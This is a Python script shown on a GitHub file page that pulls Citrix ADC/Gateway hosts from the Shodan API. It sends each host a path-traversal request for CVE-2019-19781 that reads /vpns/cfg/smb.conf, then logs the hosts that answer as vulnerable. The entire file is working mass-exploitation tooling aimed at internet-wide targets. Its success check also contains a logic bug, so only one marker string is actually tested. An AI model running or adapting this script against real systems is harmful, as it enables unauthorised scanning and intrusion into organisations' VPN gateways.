-
Notifications
You must be signed in to change notification settings - Fork 5
/
Copy pathscanner.py
94 lines (85 loc) · 2.73 KB
/
scanner.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
#!/usr/bin/python3
import sys
import time
import shodan
import argparse
import requests
from datetime import datetime
from threading import Thread, activeCount
# Shodan API Key (change according to your Shodan API key)
api_key = ''
# Shodan search query
search_query = '"http://cis.citrix.com"'
def getTime():
now = datetime.now()
return now.strftime('%H:%M:%S')
def showInfo(message):
print('[\033[1;94m{}\033[0;m] [*] {}'.format(getTime(), message))
def showFail(message):
print('[\033[1;94m{}\033[0;m] [\033[1;91m-\033[0;m] \033[1;91m{}\033[0;m'.format(getTime(), message))
def showSuccess(message):
print('[\033[1;94m{}\033[0;m] [\033[1;92m+\033[0;m] \033[1;92m{}\033[0;m'.format(getTime(), message))
def exit(message = None):
try:
if message is not None:
showFail(message)
if activeCount() > 1:
showInfo('Killig all threads')
while activeCount() > 1:
time.sleep(0.001)
showInfo('Exiting script')
sys.exit()
except KeyboardInterrupt:
pass
def check(ip, port):
try:
if port is 80:
r = requests.get("http://{}:{}/vpn/../vpns/cfg/smb.conf".format(ip, port), verify=False, timeout=5)
else:
r = requests.get("https://{}:{}/vpn/../vpns/cfg/smb.conf".format(ip, port), verify=False, timeout=5)
if "[global]" and "encrypt passwords" and "name resolve order" in r.text:
showSuccess("{} : {} is vulnerable!".format(ip, port))
with open("cve-2019-19781_result.txt", "a+") as f:
f.write("{}:{}\n".format(ip, port))
f.close()
else:
showFail("{} : {} is not vulnerable".format(ip, port))
except KeyboardInterrupt:
exit('User aborted!')
except:
showFail("{} : {} is not vulnerable".format(ip, port))
def main(args):
try:
api = shodan.Shodan(api_key)
showInfo('Querying from Shodan API')
showInfo('Using query: {}'.format(search_query))
search = api.search_cursor(search_query)
showInfo('Retrieved IPs from Shodan')
showInfo('Starting scan')
for result in search:
ip = result['ip_str'].strip()
port = result['port']
th = Thread(target=check, args=(ip, port,))
th.daemon = True
th.start()
while activeCount() > args.threads:
time.sleep(0.001)
while activeCount() > 1:
time.sleep(0.001)
exit('Scan ended')
except Exception as e:
print(e)
if __name__ == '__main__':
try:
desc = 'Automated script for CVE-2019-19781 from Shodan API.'
args = argparse.ArgumentParser(description=desc)
args.add_argument('-t', '--threads', dest='threads', type=int, default=5, help='number of connection threads (default: 5)')
args = args.parse_args()
if not api_key.strip():
exit('Shodan API key cannot be blank!')
if not search_query.strip():
exit('Shodan search query cannot be blank!')
showInfo('Starting script')
main(args)
except KeyboardInterrupt:
exit('User aborted!')